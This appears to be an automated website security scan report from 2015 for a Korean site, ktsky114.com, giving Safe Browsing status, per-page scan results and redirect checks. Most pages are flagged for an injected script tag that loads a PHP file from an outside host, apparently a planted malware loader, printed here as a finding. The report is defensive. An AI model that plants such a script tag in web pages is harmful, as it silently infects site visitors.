Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ktsky114.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ktsky114.com/ | 200 OK Content-Length: 34445 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/css_js/java.js | 200 OK Content-Length: 8545 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=doc Antivirus reports:
| ||
http://ktsky114.com/css_js/float.js | 200 OK Content-Length: 5526 Content-Type: application/x-javascript | clean |
http://ktsky114.com/css_js/js_rolling.js | 200 OK Content-Length: 13286 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var js_rolling = function(this_s){ if(this_s.nodeType == 1){ this.this_s = this_s; }else{ this.this_s = document.getElementById(this_s); } this.is_rolling = false; this.direction = 1; this.children = null; this.move_gap = 1; this.time_dealy = 100; this.time_dealy_pause = 1000; this.time_timer=null; this.time_timer_pause=null; this.mouseover=false; this.init(); this.set_direction(this.direction); } js_ro Antivirus reports:
| ||
http://ktsky114.com/board/pro_online.htm | 200 OK Content-Length: 35962 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/board/../bbs/_template/admin/default/member_fun.js | 200 OK Content-Length: 10834 Content-Type: application/x-javascript | clean |
http://ktsky114.com/skylife/01.htm | 200 OK Content-Length: 14971 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/internet/01.htm | 200 OK Content-Length: 12129 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/phone/01.htm | 200 OK Content-Length: 12793 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/board/gift.htm | 200 OK Content-Length: 9883 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/board/gift_online.htm | 200 OK Content-Length: 9866 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/skylife/02.htm | 200 OK Content-Length: 12363 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/skylife/03.htm | 200 OK Content-Length: 11943 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/skylife/04.htm | 200 OK Content-Length: 7034 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> | ||
http://ktsky114.com/internet/02.htm | 200 OK Content-Length: 12129 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.black-fighter.de/downloads/xPDkRtcF.php?id=45824732"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ktsky114.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 16:35:35 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=EUC-KR
Set-Cookie: cookie_referer=cea8bd198e4ea28f64eb5747e4bc5c1f; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: ktsky114.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 16:35:35 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=EUC-KR
Set-Cookie: cookie_referer=cea8bd198e4ea28f64eb5747e4bc5c1f; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: ktsky114.com
Referer: http://www.google.com/search?q=ktsky114.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ktsky114.com
Referer: http://www.google.com/search?q=ktsky114.com
Result:
The result is similar to the first query. There are no suspicious redirects found.